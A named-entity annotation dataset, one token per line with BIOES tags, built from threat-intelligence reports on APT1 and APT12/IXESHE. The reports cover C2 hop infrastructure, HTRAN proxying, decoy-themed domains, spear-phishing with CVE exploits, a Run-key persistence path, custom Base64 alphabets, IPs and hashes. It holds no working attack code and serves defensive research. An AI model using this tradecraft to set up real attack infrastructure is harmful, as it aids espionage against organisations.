APT1 S-APT
has O
registered O
hundreds O
of O
domain O
names O
, O
the O
majority O
of O
which O
also O
point O
to O
a O
Shanghai S-LOC
locale O
. O

The O
domain O
names O
and O
IP O
addresses O
together O
comprise O
APT1 S-APT
’s O
command B-TOOL
and I-TOOL
control E-TOOL
framework O
which O
they O
manage O
in O
concert O
to O
camouflage O
their O
true O
origin O
from O
their O
English O
speaking O
targets O
. O

As O
covered O
in O
the O
previous O
“ O
Attack O
Lifecycle O
” O
section O
, O
WEBC2 B-MAL
backdoor E-MAL
variants O
download O
and O
interpret O
data O
stored O
between O
tags O
in O
HTML S-TOOL
pages O
as O
commands O
. O

They O
usually O
download O
HTML S-TOOL
pages O
from O
a O
system O
within O
APT1 S-APT
’s O
hop O
infrastructure O
. O

We O
have O
observed O
APT1 S-APT
intruders O
logging O
in O
to O
WEBC2 S-MAL
servers O
and O
manually O
editing O
the O
HTML S-TOOL
pages O
that O
backdoors O
will O
download O
. O

Because O
the O
commands O
are O
usually O
encoded O
and O
difficult O
to O
spell O
from O
memory O
, O
APT1 S-APT
intruders O
typically O
do O
not O
type O
these O
strings O
, O
but O
instead O
copy O
and O
paste O
them O
into O
the O
HTML S-TOOL
files O
. O

They O
likely O
generate O
the O
encoded O
commands O
on O
their O
own O
systems O
before O
pasting O
them O
in O
to O
an O
HTML S-TOOL
file O
hosted O
by O
the O
hop O
point O
. O

For O
example O
, O
we O
observed O
an O
APT O
attacker O
pasting O
the O
string O
“ O
czo1NA== O
” O
into O
an O
HTML S-TOOL
page O
. O

That O
string O
is O
the O
base64 S-ENCR
encoded O
version O
of O
“ O
s O
: O
54 O
” O
, O
meaning O
“ O
sleep O
for O
54 O
minutes O
” O
( O
or O
hours O
, O
depending O
on O
the O
particular O
backdoor O
) O
. O

In O
lieu O
of O
manually O
editing O
an O
HTML S-TOOL
file O
on O
a O
hop O
point O
, O
we O
have O
also O
observed O
APT1 S-APT
intruders O
uploading O
new O
( O
already-edited O
) O
HTML S-TOOL
files O
. O

When O
APT1 S-APT
attackers O
are O
not O
using O
WEBC2 S-MAL
, O
they O
require O
a O
“ O
command B-TOOL
and I-TOOL
control E-TOOL
” O
( O
C2 S-TOOL
) O
user O
interface O
so O
they O
can O
issue O
commands O
to O
the O
backdoor O
. O

This O
interface O
sometimes O
runs O
on O
their O
personal O
attack O
system O
, O
which O
is O
typically O
in O
Shanghai S-LOC
. O

In O
these O
instances O
, O
when O
a O
victim O
backdoor O
makes O
contact O
with O
a O
hop O
, O
the O
communications O
need O
to O
be O
forwarded O
from O
the O
hop O
to O
the O
intruder O
’s O
Shanghai S-LOC
system O
so O
the O
backdoor O
can O
talk O
to O
the O
C2 S-TOOL
server O
software O
. O

We O
have O
observed O
767 O
separate O
instances O
in O
which O
APT1 S-APT
intruders O
used O
the O
publicly O
available O
“ O
HUC B-TOOL
Packet I-TOOL
Transmit I-TOOL
Tool E-TOOL
” O
or O
HTRAN S-TOOL
on O
a O
hop O
. O

As O
always O
, O
keep O
in O
mind O
that O
these O
uses O
are O
confirmed O
uses O
, O
and O
likely O
represent O
only O
a O
small O
fraction O
of O
APT1 S-APT
’s O
total O
activity O
. O

The O
HTRAN S-TOOL
utility O
is O
merely O
a O
middle-man O
, O
facilitating O
connections O
between O
the O
victim O
and O
the O
attacker O
who O
is O
using O
the O
hop O
point O
. O

Typical O
use O
of O
HTRAN S-TOOL
is O
fairly O
simple O
: O
the O
attacker O
must O
specify O
the O
originating O
IP O
address O
( O
of O
his O
or O
her O
workstation O
in O
Shanghai S-LOC
) O
, O
and O
a O
port O
on O
which O
to O
accept O
connections O
. O

For O
example O
, O
the O
following O
command O
, O
which O
was O
issued O
by O
an O
APT1 S-APT
actor O
, O
will O
listen O
for O
incoming O
connections O
on O
port O
443 O
on O
the O
hop O
and O
automatically O
proxy O
them O
to O
the O
Shanghai S-LOC
IP O
address O
58.247.242.254 S-IP
on O
port O
443 O
. O

Occasionally O
, O
APT1 S-APT
attackers O
have O
installed O
C2 S-TOOL
server O
components O
on O
systems O
in O
their O
hop O
infrastructure O
rather O
than O
forwarding O
connections O
back O
to O
C2 S-TOOL
servers O
in O
Shanghai S-LOC
. O

In O
these O
instances O
they O
do O
not O
need O
to O
use O
a O
proxy O
tool O
like O
HTRAN S-TOOL
to O
interact O
with O
victim O
systems O
. O

However O
, O
it O
does O
mean O
that O
the O
intruders O
need O
to O
be O
able O
to O
interface O
with O
the O
( O
often O
graphical O
) O
C2 S-TOOL
server O
software O
running O
on O
the O
hop O
. O

We O
have O
observed O
APT1 S-APT
intruders O
log O
in O
to O
their O
hop O
point O
, O
start O
the O
C2 S-TOOL
server O
, O
wait O
for O
incoming O
connections O
, O
and O
then O
proceed O
to O
give O
commands O
to O
victim O
systems O
. O

WEBC2 S-MAL
variants O
may O
include O
a O
server O
component O
that O
provides O
a O
simple O
C2 S-TOOL
interface O
to O
the O
intruder O
. O

This O
saves O
the O
intruder O
from O
having O
to O
manually O
edit O
webpages O
. O

That O
is O
, O
this O
server O
component O
receives O
connections O
from O
victim O
backdoors O
, O
displays O
them O
to O
the O
intruder O
, O
and O
then O
translates O
the O
intruder O
’s O
commands O
into O
HTML S-TOOL
tags O
that O
the O
victim O
backdoors O
read O
. O

In O
the O
last O
two O
years O
alone O
, O
we O
have O
confirmed O
937 O
APT1 S-APT
C2 S-TOOL
servers O
— O
that O
is O
, O
actively O
listening O
or O
communicating O
programs O
— O
running O
on O
849 O
distinct O
IP O
addresses O
. O

However O
, O
we O
have O
evidence O
to O
suggest O
that O
APT1 S-APT
is O
running O
hundreds O
, O
and O
likely O
thousands O
, O
of O
other O
servers O
( O
see O
the O
Domains O
section O
below O
) O
. O

The O
programs O
acting O
as O
APT1 S-APT
servers O
have O
mainly O
been O
: O
FTP S-PROT
, O
for O
transferring O
files O
; O
web O
, O
primarily O
for O
WEBC2 S-MAL
; O
RDP S-PROT
, O
for O
remote O
graphical O
control O
of O
a O
system O
; O
HTRAN S-TOOL
, O
for O
proxying O
; O
and O
C2 S-TOOL
servers O
associated O
with O
various O
backdoor O
families O
. O

The O
Domain B-PROT
Name I-PROT
System E-PROT
( O
DNS S-PROT
) O
is O
the O
phone O
book O
of O
the O
Internet O
. O

In O
the O
same O
way O
that O
people O
program O
named O
contacts O
into O
their O
cell O
phones O
and O
no O
longer O
need O
to O
remember O
phone O
numbers O
, O
DNS S-PROT
allows O
people O
to O
remember O
names O
like O
“ O
google.com S-DOM
” O
instead O
of O
IP O
addresses O
. O

When O
a O
person O
types O
“ O
google.com S-DOM
” O
into O
a O
web O
browser O
, O
a O
DNS S-PROT
translation O
to O
an O
IP O
address O
occurs O
so O
that O
the O
person O
’s O
computer O
can O
communicate O
with O
Google S-IDTY
. O

Names O
that O
can O
be O
translated O
through O
DNS S-PROT
to O
IP O
addresses O
are O
referred O
to O
as O
Fully B-TOOL
Qualified I-TOOL
Domain I-TOOL
Names E-TOOL
( O
FQDNs S-TOOL
) O
. O

A O
DNS S-PROT
zone O
represents O
a O
collection O
of O
FQDNs S-TOOL
that O
end O
with O
the O
same O
name O
, O
and O
which O
are O
usually O
registered O
through O
a O
domain O
registration O
company O
and O
controlled O
by O
a O
single O
owner O
. O

For O
example O
, O
“ O
hugesoft.org S-DOM
” O
is O
an O
FQDN S-TOOL
but O
also O
represents O
a O
zone O
. O

The O
FQDNs S-TOOL
“ O
ug-co.hugesoft.org S-DOM
” O
and O
“ O
7cback.hugesoft.org S-DOM
” O
are O
part O
of O
the O
“ O
hugesoft.org S-DOM
” O
zone O
and O
are O
called O
“ O
subdomains O
” O
of O
the O
zone O
. O

The O
person O
who O
registered O
“ O
hugesoft.org S-DOM
” O
may O
add O
as O
many O
subdomains O
as O
they O
wish O
and O
controls O
the O
IP O
resolutions O
of O
these O
FQDNs S-TOOL
. O

APT1 S-APT
has O
registered O
at O
least O
107 O
zones O
since O
2004 S-TIME
. O

Within O
these O
zones O
, O
we O
know O
of O
thousands O
of O
FQDNs S-TOOL
that O
have O
resolved O
to O
hundreds O
of O
IP O
addresses O
( O
which O
we O
suspect O
are O
hops O
) O
and O
in O
some O
instances O
to O
APT1 S-APT
’s O
source O
IP O
addresses O
in O
Shanghai S-LOC
. O

The O
first O
zone O
we O
became O
aware O
of O
was O
“ O
hugesoft.org S-DOM
” O
, O
which O
was O
registered O
through O
eNom O
, O
Inc. O
in O
October B-TIME
2004 E-TIME
. O

The O
registrant O
supplied O
“ O
uglygorilla@163.com S-EMAIL
” O
as O
an O
email S-TOOL
address O
. O

The O
supplied O
registration O
information O
, O
which O
is O
still O
visible O
in O
public O
“ O
whois S-TOOL
” O
data O
as O
of O
February B-TIME
3, I-TIME
2013 E-TIME
. O

The O
supplied O
registrant O
information O
does O
not O
need O
to O
be O
accurate O
for O
the O
zone O
to O
be O
registered O
successfully O
. O

For O
example O
, O
“ O
shanghai O
” O
is O
not O
a O
street O
name O
. O

Nevertheless O
, O
it O
is O
noteworthy O
that O
Shanghai S-LOC
appeared O
in O
the O
first O
known O
APT1 S-APT
domain O
registration O
, O
along O
with O
a O
phone O
number O
that O
begins O
with O
China S-LOC
’s O
“ O
+86 O
” O
international O
code O
. O

In O
fact O
, O
Shanghai S-LOC
was O
listed O
as O
the O
registrant O
’s O
city O
in O
at O
least O
24 O
of O
the O
107 O
( O
22% O
) O
registrations O
. O

Overall O
, O
the O
combination O
of O
a O
relatively O
high O
number O
of O
“ O
Shanghai S-LOC
” O
registrations O
with O
obviously O
false O
registration O
examples O
in O
other O
registrations O
suggests O
a O
partially O
uncoordinated O
domain O
registration O
campaign O
from O
2004 S-TIME
until O
present O
, O
in O
which O
some O
registrants O
tried O
to O
fabricate O
non-Shanghai S-LOC
locations O
but O
others O
did O
not O
. O

This O
is O
supported O
by O
contextual O
information O
on O
the O
Internet O
for O
the O
email S-TOOL
address O
“ O
lfengg@163.com S-EMAIL
, O
” O
which O
was O
supplied O
in O
the O
registration O
information O
for O
seven O
of O
the O
107 O
zones O
. O

On O
the O
site O
“ O
www.china-one.org S-DOM
, O
” O
the O
email S-TOOL
address O
“ O
lfengg@163.com S-EMAIL
” O
appears O
as O
the O
contact O
for O
the O
Shanghai S-LOC
Kai B-IDTY
Optical I-IDTY
Information I-IDTY
Technology E-IDTY
Co. O
, O
Ltd. O
, O
a O
website O
production O
company O
located O
in O
a O
part O
of O
Shanghai S-LOC
that O
is O
across O
the O
river O
from O
PLA S-IDTY
Unit B-IDTY
61398 E-IDTY
. O

About O
half O
of O
APT1 S-APT
’s O
known O
zones O
were O
named O
according O
to O
three O
themes O
: O
news O
, O
technology O
and O
business O
. O

These O
themes O
cause O
APT1 S-APT
command O
and O
control O
addresses O
to O
appear O
benign O
at O
first O
glance O
. O

However O
, O
we O
believe O
that O
the O
hundreds O
of O
FQDNs S-TOOL
within O
these O
zones O
were O
created O
for O
the O
purpose O
of O
APT1 S-APT
intrusions O
. O
( O
Note O
: O
these O
themes O
are O
not O
unique O
to O
APT1 S-APT
or O
even O
APT O
in O
general O
. O
) O
The O
news-themed O
zones O
include O
the O
names O
of O
well-known O
news O
media O
outlets O
such O
as O
CNN S-IDTY
, O
Yahoo S-IDTY
and O
Reuters S-IDTY
. O

However O
, O
they O
also O
include O
names O
referencing O
English-speaking O
countries O
, O
such O
as O
“ O
aunewsonline.com S-DOM
” O
( O
Australia S-LOC
) O
, O
“ O
canadatvsite.com S-DOM
” O
( O
Canada S-LOC
) O
, O
and O
“ O
todayusa.org S-DOM
” O
( O
U.S B-LOC
. E-LOC
) O
. O

Below O
is O
a O
list O
of O
zones O
registered O
by O
APT1 S-APT
that O
are O
newsthemed O
: O

aoldaily.com S-DOM
aunewsonline.com S-DOM
canadatvsite.com S-DOM
canoedaily.com S-DOM
cnndaily.com S-DOM
cnndaily.net S-DOM
cnnnewsdaily.com S-DOM
defenceonline.net S-DOM
freshreaders.net S-DOM
giftnews.org S-DOM
reutersnewsonline.com S-DOM
rssadvanced.org S-DOM
saltlakenews.org S-DOM
sportreadok.net S-DOM
todayusa.org S-DOM
usapappers.com S-DOM
usnewssite.com S-DOM
yahoodaily.com S-DOM
. O

The O
technology-themed O
zones O
reference O
well-known O
technology O
companies O
( O
AOL S-IDTY
, O
Apple S-IDTY
, O
Google S-IDTY
, O
Microsoft S-IDTY
) O
, O
antivirus O
vendors O
( O
McAfee S-IDTY
, O
Symantec S-IDTY
) O
, O
and O
products O
( O
Blackberry S-IDTY
, O
Bluecoat S-IDTY
) O
. O

APT1 S-APT
also O
used O
more O
generic O
names O
referencing O
topics O
like O
software O
: O

globalowa.com S-DOM
gmailboxes.com S-DOM
hugesoft.org S-DOM
idirectech.com S-DOM
ifexcel.com S-DOM
infosupports.com S-DOM
livemymsn.com S-DOM
mcafeepaying.com S-DOM
microsoft-update-info.com S-DOM
micyuisyahooapis.com S-DOM
msnhome.org S-DOM
pcclubddk.net S-DOM
progammerli.com S-DOM
softsolutionbox.net S-DOM
symanteconline.net S-DOM
webservicesupdate.com S-DOM
. O

Finally O
, O
some O
zones O
used O
by O
APT1 S-APT
reflect O
a O
business O
theme O
. O

The O
names O
suggest O
websites O
that O
professionals O
might O
visit O
: O

advanbusiness.com S-DOM
businessconsults.net S-DOM
businessformars.com S-DOM
companyinfosite.com S-DOM
conferencesinfo.com S-DOM
copporationnews.com S-DOM
. O

APT1 S-APT
intruders O
often O
use O
the O
FQDNs S-TOOL
that O
are O
associated O
with O
legitimate O
websites O
hosted O
by O
their O
hop O
points O
. O

We O
consider O
these O
domains O
to O
be O
“ O
hijacked O
” O
because O
they O
were O
registered O
by O
someone O
for O
a O
legitimate O
reason O
, O
but O
have O
been O
leveraged O
by O
APT1 S-APT
for O
malicious O
purposes O
. O

APT1 S-APT
uses O
hijacked O
FQDNs S-TOOL
for O
two O
main O
purposes O
. O

First O
, O
they O
place O
malware O
( O
usually O
in O
ZIP S-TOOL
files O
) O
on O
the O
legitimate O
websites O
hosted O
on O
the O
hop O
point O
and O
then O
send O
spear B-ACT
phishing E-ACT
emails S-TOOL
with O
a O
link O
that O
includes O
the O
legitimate O
FQDN S-TOOL
. O


APT12 S-APT
. O

This O
research O
paper O
will O
delve O
into O
another O
prominent O
group O
of O
attackers O
referred O
to O
as O
“ O
IXESHE S-APT
” O
( O
pronounced O
“ O
i-sushi O
” O
) O
, O
based O
on O
one O
of O
the O
more O
common O
detection O
names O
security O
companies O
use O
for O
the O
malware O
they O
utilize O
. O

This O
campaign O
is O
notable O
for O
targeting O
East O
Asian O
governments O
, O
electronics O
manufacturers O
, O
and O
a O
telecommunications O
company O
. O

The O
IXESHE S-APT
campaign O
makes O
use O
of O
targeted O
emails S-TOOL
with O
malicious O
attachments O
to O
compromise O
victims O
’ O
systems O
. O

The O
emails S-TOOL
are O
often O
tailored O
for O
specific O
victims O
and O
contain O
malicious O
attachments O
that O
are O
almost O
always O
“ O
weaponized O
” O
.PDF S-FILE
files O
with O
known O
exploits O
that O
drop O
malware O
executables O
onto O
targeted O
systems O
. O

In O
addition O
, O
the O
IXESHE S-APT
attackers O
conducted O
two O
specific O
attacks O
that O
leveraged O
zero-day S-VULNAME
exploits—one O
in O
2009 O
and O
another O
in O
2011 O
. O

The O
IXESHE S-APT
attackers O
almost O
always O
make O
use O
of O
compromised O
servers O
as O
command-and-control S-TOOL
( O
C&C S-TOOL
) O
servers O
. O

In O
some O
cases O
, O
the O
compromised O
servers O
are O
hosted O
on O
target O
organizations O
’ O
networks O
after O
successful O
infiltration O
so O
the O
attackers O
can O
increase O
their O
control O
of O
the O
victims O
’ O
infrastructure O
. O

Using O
this O
approach O
, O
the O
attackers O
amassed O
at O
least O
60 O
C&C S-TOOL
servers O
over O
time O
. O

This O
technique O
also O
allows O
the O
attackers O
to O
cover O
their O
tracks O
, O
as O
having O
the O
C&C S-TOOL
server O
in O
the O
victims O
’ O
corporate O
networks O
means O
very O
little O
C&C S-TOOL
traffic O
leaves O
them O
. O

The O
attackers O
’ O
deliberate O
use O
of O
compromised O
machines O
and O
dynamic O
Domain B-PROT
Name I-PROT
System E-PROT
( O
DNS S-PROT
) O
services O
allows O
them O
to O
hide O
traces O
of O
their O
presence O
by O
confusing O
their O
activities O
with O
data O
belonging O
to O
legitimate O
individuals O
. O

Looking O
at O
threat O
intelligence O
derived O
from O
tracking O
APT O
campaigns O
over O
time O
primarily O
based O
on O
the O
network O
traffic O
generated O
by O
the O
malware O
used O
, O
we O
were O
able O
to O
develop O
indicators O
of O
compromise O
for O
the O
IXESHE S-APT
campaign O
. O

The O
malware O
samples O
used O
in O
this O
campaign O
were O
not O
very O
complicated O
by O
nature O
but O
do O
give O
the O
attackers O
almost O
complete O
control O
over O
their O
targets O
’ O
compromised O
systems O
. O

Most O
of O
the O
IP O
addresses O
of O
IXESHE S-APT
’s O
victims O
are O
linked O
to O
DSL S-TOOL
networks O
, O
which O
made O
it O
difficult O
to O
determine O
their O
identities O
. O

Careful O
research O
, O
however O
, O
allowed O
the O
identification O
of O
some O
of O
the O
attackers O
’ O
victims O
: O
East O
Asian O
governments O
, O
Taiwanese O
electronics O
manufacturers O
, O
A O
telecommunications O
company O
. O

Campaign O
victims O
were O
identified O
by O
using O
Whois S-TOOL
records O
and O
open O
source O
research O
. O

Trend B-SECTEAM
Micro E-SECTEAM
generally O
notifies O
customers O
that O
are O
believed O
to O
have O
been O
specifically O
targeted O
by O
APT O
campaigns O
. O

The O
IXESHE S-APT
attackers O
have O
been O
actively O
launching O
highly O
targeted O
attacks O
since O
at O
least O
July O
2009 O
. O

Available O
data O
on O
the O
IXESHE S-APT
campaign O
indicates O
that O
targeted O
emails S-TOOL
with O
malicious O
.PDF S-FILE
file O
attachments O
were O
the O
attackers O
’ O
vector O
of O
choice O
. O

In O
most O
cases O
, O
the O
attacks O
involved O
Adobe B-TOOL
Acrobat E-TOOL
, O
Reader S-TOOL
, O
and O
Flash B-TOOL
Player E-TOOL
exploits O
such O
as O
: O
CVE-2009-4324 S-VULID
, O
CVE-2009-0927 S-VULID
, O
CVE-2011-0609 S-VULID
, O
CVE-2011-0611 S-VULID
. O

It O
should O
also O
be O
noted O
that O
this O
campaign O
used O
CVE-2009-4324 S-VULID
and O
CVE-2011-0609 S-VULID
exploits O
when O
these O
were O
still O
unpatched O
or O
considered O
zero-day S-VULNAME
vulnerabilities O
. O

The O
IXESHE S-APT
attackers O
also O
used O
an O
exploit O
that O
affected O
Microsoft S-IDTY
Excel S-TOOL
— O
CVE-2009-3129 S-VULID
. O

Every O
IXESHE S-APT
case O
we O
examined O
revealed O
that O
the O
original O
infection O
vector O
was O
a O
targeted O
email S-TOOL
with O
a O
PDF S-TOOL
exploit O
as O
attachment O
. O

Older O
versions O
also O
used O
an O
XLS S-TOOL
exploit O
. O

Opening O
the O
.PDF S-FILE
file O
drops O
and O
executes O
a O
malware O
in O
a O
victim O
’s O
system O
. O

The O
malware O
displays O
a O
blank O
.PDF O
file O
or O
a O
decoy O
document O
related O
to O
the O
targeted O
attack O
. O

The O
emails S-TOOL
normally O
come O
from O
compromised O
personal O
accounts O
or O
are O
entirely O
spoofed O
. O

emails S-TOOL
from O
spoofed O
senders O
were O
usually O
sent O
via O
mail O
servers O
in O
the O
United B-LOC
States E-LOC
and O
China S-LOC
. O

The O
malware O
also O
sets O
the O
executable O
file O
’s O
attributes O
to O
“ O
Hidden. O
” O
Some O
of O
the O
file O
names O
the O
attackers O
used O
include O
: O
winhlps.exe S-FILE
, O
acrotry.exe S-FILE
, O
AcroRd32.exe S-FILE
, O
Updater.exe S-FILE
. O

In O
order O
for O
the O
malware O
to O
survive O
rebooting O
, O
it O
normally O
creates O
the O
following O
registry O
run O
key O
: O
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run O
. O

The O
registry O
run O
key O
, O
in O
turn O
, O
points O
to O
the O
malware O
that O
has O
been O
dropped O
. O

The O
value O
name O
of O
this O
entry O
varies O
from O
sample O
to O
sample O
. O

Some O
of O
the O
names O
the O
attackers O
used O
for O
it O
include O
: O
Adobe B-TOOL
Assistant E-TOOL
, O
Migrated S-TOOL
. O

Upon O
installation O
, O
the O
malware O
starts O
communicating O
with O
one O
of O
its O
C&C S-TOOL
servers O
. O

Most O
of O
the O
samples O
appeared O
to O
have O
at O
least O
three O
C&C S-TOOL
servers O
hard O
coded O
for O
redundancy O
. O

Some O
samples O
alternatively O
use O
an O
FGKD.jsp S-FILE
or O
an O
FPK.jsp S-FILE
file O
. O

The O
Base64 S-ENCR
blob O
is O
of O
particular O
interest O
. O

It O
makes O
use O
of O
a O
custom O
Base64 S-ENCR
alphabet O
. O

Once O
decoded O
, O
this O
blob O
reveals O
a O
standardized O
structure O
of O
the O
information O
sent O
to O
the O
registered O
C&C S-TOOL
server O
, O
which O
includes O
the O
following O
details O
: O
Computer O
name O
, O
Local O
IP O
address O
, O
Proxy O
server O
IP O
and O
port O
, O
Malware O
ID O
. O

To O
date O
, O
we O
have O
seen O
several O
custom O
Base64 S-ENCR
alphabets O
, O
including O
: O
+NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA O
, O
HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
, O
j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we O
mKckJLBofCDrs9VtWXlEu O
, O
p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ O
zPgUx67FMhYb8q3wemKc O
, O
aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
, O
ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
. O

Some O
similarities O
exist O
across O
different O
versions O
of O
the O
Base64 S-ENCR
alphabet O
, O
which O
indicates O
that O
these O
are O
most O
likely O
not O
completely O
randomly O
generated O
. O

Instead O
, O
the O
attackers O
manually O
cut O
and O
pasted O
older O
versions O
after O
altering O
some O
parts O
. O

The O
malware O
ID O
seems O
to O
be O
a O
campaign O
code O
with O
a O
different O
IP O
address O
for O
each O
attack O
. O

Some O
of O
the O
campaign O
codes O
we O
have O
seen O
include O
: O
CRML_0505 S-MAL
, O
CRML_MIL S-MAL
, O
Firebox4 S-MAL
, O
JUST_0525 S-MAL
, O
ML0628 S-MAL
, O
MW0629 S-MAL
, O
OM222 S-MAL
. O

The O
IXESHE S-APT
campaign O
has O
been O
successfully O
executing O
targeted O
attacks O
since O
2009 O
. O

The O
attackers O
primarily O
use O
malicious O
.PDF S-FILE
files O
that O
exploit O
vulnerabilities O
in O
Adobe B-TOOL
Reader E-TOOL
, O
Acrobat S-TOOL
, O
and O
Flash B-TOOL
Player E-TOOL
, O
including O
the O
use O
of O
two O
zero-day S-VULNAME
exploits—one O
in O
2009 O
and O
another O
in O
2011 O
. O

While O
the O
attackers O
primarily O
targeted O
East O
Asian O
governments O
in O
the O
past O
, O
they O
have O
also O
started O
targeting O
a O
telecommunications O
company O
and O
electronics O
manufacturers O
. O

They O
kept O
track O
of O
their O
targeted O
attacks O
by O
embedding O
a O
“ O
campaign O
tag O
” O
in O
the O
malware O
that O
appears O
to O
describe O
when O
each O
attack O
was O
launched O
and O
, O
in O
some O
cases O
, O
the O
nature O
of O
its O
target O
. O

We O
found O
more O
than O
40 O
of O
these O
campaign O
tags O
. O

The O
IXESHE S-APT
attackers O
are O
notable O
for O
their O
use O
of O
compromised O
machines O
within O
a O
target O
’s O
internal O
network O
as O
C&C S-TOOL
servers O
. O

This O
helped O
disguise O
their O
activities O
. O

In O
addition O
, O
the O
attackers O
’ O
use O
of O
the O
proxy O
tool O
, O
HTran S-TOOL
, O
also O
helped O
mask O
their O
true O
location O
. O

While O
their O
identities O
remain O
unknown O
, O
the O
attackers O
behind O
the O
IXESHE S-APT
campaign O
demonstrated O
that O
they O
were O
both O
determined O
and O
capable O
. O

While O
the O
malware O
used O
in O
the O
attacks O
were O
not O
very O
complicated O
by O
nature O
, O
these O
proved O
very O
effective O
. O


APT12 S-APT
. O

The O
attackers O
referred O
to O
as O
APT12 S-APT
( O
also O
known O
as O
IXESHE S-APT
, O
DynCalc S-APT
, O
and O
DNSCALC S-APT
) O
recently O
started O
a O
new O
campaign O
targeting O
organizations O
in O
Japan S-LOC
and O
Taiwan S-LOC
. O

APT12 S-APT
is O
believed O
to O
be O
a O
cyber O
espionage O
group O
thought O
to O
have O
links O
to O
the O
Chinese B-IDTY
People's I-IDTY
Liberation I-IDTY
Army E-IDTY
. O

APT12 S-APT
's O
targets O
are O
consistent O
with O
larger O
People's B-IDTY
Republic I-IDTY
of I-IDTY
China E-IDTY
( O
PRC S-IDTY
) O
goals O
. O

Intrusions O
and O
campaigns O
conducted O
by O
this O
group O
are O
in-line O
with O
PRC S-IDTY
goals O
and O
self-interest O
in O
Taiwan S-LOC
. O

Additionally O
, O
the O
new O
campaigns O
we O
uncovered O
further O
highlight O
the O
correlation O
between O
APT O
groups O
ceasing O
and O
retooling O
operations O
after O
media O
exposure O
, O
as O
APT12 S-APT
used O
the O
same O
strategy O
after O
compromising O
the O
New B-IDTY
York I-IDTY
Times E-IDTY
in O
Oct O
2012 O
. O

Much O
like O
Darwin O
’s O
theory O
of O
biological O
evolution O
, O
APT12 S-APT
been O
forced O
to O
evolve O
and O
adapt O
in O
order O
to O
maintain O
its O
mission O
. O

FireEye S-SECTEAM
researchers O
discovered O
two O
possibly O
related O
campaigns O
utilizing O
two O
other O
backdoors O
known O
as O
THREEBYTE S-MAL
and O
WATERSPOUT S-MAL
. O

Both O
backdoors O
were O
dropped O
from O
malicious O
documents O
built O
utilizing O
the O
“ O
Tran B-TOOL
Duy I-TOOL
Linh E-TOOL
” O
exploit O
kit O
, O
which O
exploited O
CVE-2012-0158 S-VULID
. O

These O
documents O
were O
also O
emailed O
to O
organizations O
in O
Japan S-LOC
and O
Taiwan S-LOC
. O

While O
APT12 S-APT
has O
previously O
used O
THREEBYTE S-MAL
, O
it O
is O
unclear O
if O
APT12 S-APT
was O
responsible O
for O
the O
recently O
discovered O
campaign O
utilizing O
THREEBYTE S-MAL
. O

Similarly O
, O
WATERSPOUT S-MAL
is O
a O
newly O
discovered O
backdoor O
and O
the O
threat O
actors O
behind O
the O
campaign O
have O
not O
been O
positively O
identified O
. O

However O
, O
the O
WATERSPOUT S-MAL
campaign O
shared O
several O
traits O
with O
the O
RIPTIDE S-MAL
and O
HIGHTIDE S-MAL
campaign O
that O
we O
have O
attributed O
to O
APT12 S-APT
. O

From O
October O
2012 O
to O
May O
2014, O
FireEye S-SECTEAM
observed O
APT12 S-APT
utilizing O
RIPTIDE S-MAL
, O
a O
proxy-aware O
backdoor O
that O
communicates O
via O
HTTP S-PROT
to O
a O
hard-coded O
command B-TOOL
and I-TOOL
control E-TOOL
( O
C2 S-TOOL
) O
server O
. O

RIPTIDE S-MAL
’s O
first O
communication O
with O
its O
C2 S-TOOL
server O
fetches O
an O
encryption O
key O
, O
and O
the O
RC4 S-ENCR
encryption O
key O
is O
used O
to O
encrypt O
all O
further O
communication O
. O

In O
June O
2014, O
Arbor S-IDTY
Networks O
published O
an O
article O
describing O
the O
RIPTIDE B-MAL
backdoor E-MAL
and O
its O
C2 S-TOOL
infrastructure O
in O
great O
depth O
. O

The O
blog O
highlighted O
that O
the O
backdoor O
was O
utilized O
in O
campaigns O
from O
March O
2011 O
till O
May O
2014 O
. O

Following O
the O
release O
of O
the O
article O
, O
FireEye S-SECTEAM
observed O
a O
distinct O
change O
in O
RIPTIDE S-MAL
’s O
protocols O
and O
strings O
. O

We O
suspect O
this O
change O
was O
a O
direct O
result O
of O
the O
Arbor S-IDTY
blog O
post O
in O
order O
to O
decrease O
detection O
of O
RIPTIDE S-MAL
by O
security O
vendors O
. O

The O
changes O
to O
RIPTIDE S-MAL
were O
significant O
enough O
to O
circumvent O
existing O
RIPTIDE S-MAL
detection O
rules O
. O

FireEye S-SECTEAM
dubbed O
this O
new O
malware O
family O
HIGHTIDE S-MAL
. O

On O
Sunday O
August O
24, O
2014 O
we O
observed O
a O
spear B-ACT
phish E-ACT
email S-TOOL
sent O
to O
a O
Taiwanese B-IDTY
government E-IDTY
ministry O
. O

Attached O
to O
this O
email S-TOOL
was O
a O
malicious O
Microsoft S-IDTY
Word S-TOOL
document O
( O
MD5: O
f6fafb7c30b1114befc93f39d0698560 S-MD5
) O
that O
exploited O
CVE-2012-0158 S-VULID
. O

It O
is O
worth O
noting O
that O
this O
email S-TOOL
appeared O
to O
have O
been O
sent O
from O
another O
Taiwanese B-IDTY
Government E-IDTY
employee O
, O
implying O
that O
the O
email S-TOOL
was O
sent O
from O
a O
valid O
but O
compromised O
account O
. O

HIGHTIDE S-MAL
: O
6e59861931fa2796ee107dc27bfdd480 S-MD5
. O

The O
HIGHTIDE B-MAL
backdoor E-MAL
connected O
directly O
to O
141.108.2.157 S-IP
. O

If O
you O
compare O
the O
HTTP S-PROT
GET O
request O
from O
the O
RIPTIDE S-MAL
samples O
to O
the O
HTTP S-PROT
GET O
request O
from O
the O
HIGHTIDE S-MAL
samples O
you O
can O
see O
the O
malware O
author O
changed O
the O
following O
items O
: O
User O
Agent O
, O
Format O
and O
structure O
of O
the O
HTTP S-PROT
Uniform B-TOOL
Resource I-TOOL
Identifier E-TOOL
( O
URI S-TOOL
) O
. O

Similar O
to O
RIPTIDE S-MAL
campaigns O
, O
APT12 S-APT
infects O
target O
systems O
with O
HIGHTIDE S-MAL
using O
a O
Microsoft S-IDTY
Word S-TOOL
( O
.doc S-FILE
) O
document O
that O
exploits O
CVE-2012-0158 S-VULID
. O

FireEye S-SECTEAM
observed O
